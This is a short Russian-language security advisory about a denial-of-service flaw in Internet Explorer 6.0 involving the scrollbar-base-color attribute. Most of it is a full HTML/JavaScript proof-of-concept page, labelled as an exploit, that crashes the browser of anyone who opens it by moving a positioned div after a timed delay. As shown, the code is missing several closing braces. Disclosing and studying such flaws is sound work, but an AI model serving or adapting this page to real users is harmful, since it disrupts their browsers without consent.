Программа: Microsoft Internet Explorer 6.0 – 6.0sp1 

Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный атакующий может вызвать отказ в обслуживании. 
Проблема связанна с некорректной обработкой scrollbar-base-color атрибута div объекта. В результате удаленный атакующий может создать Web страницу, содержащую произвольный код сценария, чтобы аварийно завершить работу браузера пользователя, пытающего просмотреть эту Web страницу. 

Эксплоит: 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> 
<html> 
<head> 
<title>CRASH-IE</title> 
<style type="text/css"> 
html, body { 
overflow-y: hidden; 
scrollbar-base-color: '#330066'; 

.crash { 
position:absolute; 
left:200px; 
top:200px; 
width:200px; 

</style> 
<script type="text/javascript"> 
function galgenfrist() { 
window.setTimeout('crashIE();',1000); 

function crashIE() { 
var moveNode = document.getElementById("move"); 
if(moveNode) { 
moveNode.style.top = "100px"; 
moveNode.style.left = "200px"; 


</script> 
</head> 
<body onload="galgenfrist();"> 
<h1>CRASH-IE</h1> 
<div id="move" class="crash"> 
<table> 
<tbody> 
<tr> 
<td> 
<textarea></textarea> 
</td> 
</tr> 
</tbody> 
</table> 
</div> 
</body> 
</html>

Оставить мнение